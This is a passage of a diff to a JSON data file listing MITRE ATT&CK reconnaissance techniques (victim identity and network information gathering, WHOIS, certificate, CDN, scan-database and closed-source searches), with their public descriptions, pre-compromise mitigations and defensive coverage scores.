-        "description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
-        "url": "https://attack.mitre.org/techniques/T1589",
+        "tid": "T1596.002",
+        "name": "Search Open Technical Databases: WHOIS",
+        "description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+        "url": "https://attack.mitre.org/techniques/T1596/002",
         "tactics": [
             "Reconnaissance"
         ],
@@ -19121,55 +41862,123 @@
             "PRE"
         ],
         "data_sources": [],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
+        "is_subtechnique": true,
+        "supertechnique": "T1596",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1589.001",
-                "name": "Gather Victim Identity Information: Credentials",
-                "url": "https://attack.mitre.org/techniques/T1589/001",
-                "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1596.003",
+        "name": "Search Open Technical Databases: Digital Certificates",
+        "description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\n\nAdversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+        "url": "https://attack.mitre.org/techniques/T1596/003",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1596",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1589.002",
-                "name": "Gather Victim Identity Information: Email Addresses",
-                "url": "https://attack.mitre.org/techniques/T1589/002",
-                "description": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.\n\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1596.004",
+        "name": "Search Open Technical Databases: CDNs",
+        "description": "Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.\n\nAdversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).",
+        "url": "https://attack.mitre.org/techniques/T1596/004",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1596",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1589.003",
-                "name": "Gather Victim Identity Information: Employee Names",
-                "url": "https://attack.mitre.org/techniques/T1589/003",
-                "description": "Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.\n\nAdversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1596.005",
+        "name": "Search Open Technical Databases: Scan Databases",
+        "description": "Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)\n\nAdversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
+        "url": "https://attack.mitre.org/techniques/T1596/005",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1596",
+        "subtechniques": [],
         "mitigations": [
             {
                 "mid": "M1056",
@@ -19178,31 +41987,25 @@
                 "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.05476190476190476,
-        "adjusted_score": 0.05476190476190476,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [],
         "nist_controls": [],
         "process_coverage": false,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.0047619047619047615,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1590",
-        "name": "Gather Victim Network Information",
-        "description": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
-        "url": "https://attack.mitre.org/techniques/T1590",
+        "tid": "T1597",
+        "name": "Search Closed Sources",
+        "description": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)\n\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+        "url": "https://attack.mitre.org/techniques/T1597",
         "tactics": [
             "Reconnaissance"
         ],
@@ -19215,70 +42018,10 @@
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1590.001",
-                "name": "Gather Victim Network Information: Domain Properties",
-                "url": "https://attack.mitre.org/techniques/T1590/001",
-                "description": "Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1590.002",
-                "name": "Gather Victim Network Information: DNS",
-                "url": "https://attack.mitre.org/techniques/T1590/002",
-                "description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\n\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1590.003",
-                "name": "Gather Victim Network Information: Network Trust Dependencies",
-                "url": "https://attack.mitre.org/techniques/T1590/003",
-                "description": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1590.004",
-                "name": "Gather Victim Network Information: Network Topology",
-                "url": "https://attack.mitre.org/techniques/T1590/004",
-                "description": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1590.005",
-                "name": "Gather Victim Network Information: IP Addresses",
-                "url": "https://attack.mitre.org/techniques/T1590/005",
-                "description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                "tid": "T1597.001",
+                "name": "Search Closed Sources: Threat Intel Vendors",
+                "url": "https://attack.mitre.org/techniques/T1597/001",
+                "description": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)\n\nAdversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
                 "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
@@ -19287,13 +42030,13 @@
                         "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
                         "url": "https://attack.mitre.org/mitigations/M1056"
                     }
-                ]
-            },
-            {
-                "tid": "T1590.006",
-                "name": "Gather Victim Network Information: Network Security Appliances",
-                "url": "https://attack.mitre.org/techniques/T1590/006",
-                "description": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                ]
+            },
+            {
+                "tid": "T1597.002",
+                "name": "Search Closed Sources: Purchase Technical Data",
+                "url": "https://attack.mitre.org/techniques/T1597/002",
+                "description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\n\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
                 "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
@@ -19313,34 +42056,66 @@
                 "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.06904761904761905,
-        "adjusted_score": 0.06904761904761905,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "18.2",
-            "18.3"
-        ],
+        "cis_controls": [],
         "nist_controls": [],
         "process_coverage": false,
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
         "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.01904761904761905,
-            "mitigation_score": 0.03636363636363636
-        },
+        "actionability_score": {},
         "choke_point_score": 0.05,
         "prevalence_score": 0
     },
     {
-        "tid": "T1591",
-        "name": "Gather Victim Org Information",
-        "description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
-        "url": "https://attack.mitre.org/techniques/T1591",
+        "tid": "T1597.001",
+        "name": "Search Closed Sources: Threat Intel Vendors",
